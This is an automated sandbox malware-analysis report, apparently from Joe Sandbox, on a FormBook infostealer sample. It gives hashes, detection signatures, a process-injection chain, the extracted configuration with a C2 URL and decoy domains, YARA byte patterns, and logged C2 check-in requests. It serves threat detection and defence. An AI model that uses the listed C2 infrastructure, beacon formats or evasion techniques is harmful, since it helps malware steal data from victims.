
Analysis Report vBugmobiJh.exe

Overview

General Information

Sample Name: vBugmobiJh.exe
Analysis ID: 356496
MD5: 5b59e521935e56a03255623df51c1631
SHA1: b6714751ef5127dd84bed782a30eb44b7add8813
SHA256: e6370f5f39e8e3d7a2506659786deadd1fe5ce8208cb2b6bf7748b6637a3b793
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • vBugmobiJh.exe (PID: 5108 cmdline: 'C:\Users\user\Desktop\vBugmobiJh.exe' MD5: 5B59E521935E56A03255623DF51C1631)
    • vBugmobiJh.exe (PID: 68 cmdline: C:\Users\user\Desktop\vBugmobiJh.exe MD5: 5B59E521935E56A03255623DF51C1631)
    • vBugmobiJh.exe (PID: 6088 cmdline: C:\Users\user\Desktop\vBugmobiJh.exe MD5: 5B59E521935E56A03255623DF51C1631)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 3664 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 5428 cmdline: /c del 'C:\Users\user\Desktop\vBugmobiJh.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rizrvd.com/bw82/"], "decoy": ["fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | Strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.vBugmobiJh.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
6.2.vBugmobiJh.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vBugmobiJh.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | Strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
6.2.vBugmobiJh.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
6.2.vBugmobiJh.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for domain / URL
Source: climaxnovels.com Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: vBugmobiJh.exe Virustotal: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: vBugmobiJh.exe Joe Sandbox ML: detected
Source: 6.2.vBugmobiJh.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: vBugmobiJh.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: vBugmobiJh.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe, 0000000A.00000002.476422535.0000000003B40000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\vBugmobiJh.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\vBugmobiJh.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\vBugmobiJh.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 94.73.146.42:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 94.73.146.42:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 94.73.146.42:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.rizrvd.com/bw82/
Source: global traffic HTTP traffic detected: GET /bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip HTTP/1.1 Host: www.h2oturkiye.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO HTTP/1.1 Host: www.ramjamdee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip HTTP/1.1 Host: www.rizrvd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY HTTP/1.1 Host: www.gdsjgf.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip HTTP/1.1 Host: www.climaxnovels.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl HTTP/1.1 Host: www.thebabyfriendly.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj HTTP/1.1 Host: www.wellnesssensation.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip HTTP/1.1 Host: www.gallerybrows.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip HTTP/1.1 Host: www.usmedicarenow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI HTTP/1.1 Host: www.activagebenefits.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 198.185.159.144
Source: Joe Sandbox View IP Address: 52.128.23.153
Source: Joe Sandbox View ASN Name: DOSARRESTUS
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: unknown DNS traffic detected: queries for: www.fcoins.club
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1237 Date: Tue, 23 Feb 2021 08:00:33 GMT Server: LiteSpeed Data Raw: [hex dump of the 404 HTML body not reproduced]
Source: explorer.exe, 00000007.00000000.255680100.000000000F659000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.agfamonotype.
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: vBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: vBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlu
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: vBugmobiJh.exe, 00000001.00000003.215875793.0000000005760000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.216329040.0000000005739000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comB.TTF
Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comM.TTFzP
Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comcomm
Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd2P
Source: vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comepko
Source: vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comm
Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comsP
Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comsiefd$P
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: vBugmobiJh.exe, 00000001.00000003.209223636.000000000573B000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comKr
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: vBugmobiJh.exe, 00000001.00000003.211716442.0000000005726000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: vBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnO
Source: vBugmobiJh.exe, 00000001.00000003.211098499.000000000572E000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnd
Source: vBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnh
Source: vBugmobiJh.exe, 00000001.00000003.211149216.0000000000D4D000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnt
Source: vBugmobiJh.exe, 00000001.00000003.218063402.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: vBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/%k
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp//P
Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/2P
Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/AP
Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ntPi
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/es
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: vBugmobiJh.exe, 00000001.00000003.214371711.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2P
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/zP
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ltt=P
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oiolP
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/sP
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/tendHP
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/uild$P
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vno
          Source: vBugmobiJh.exe, 00000001.00000003.208761960.0000000005723000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
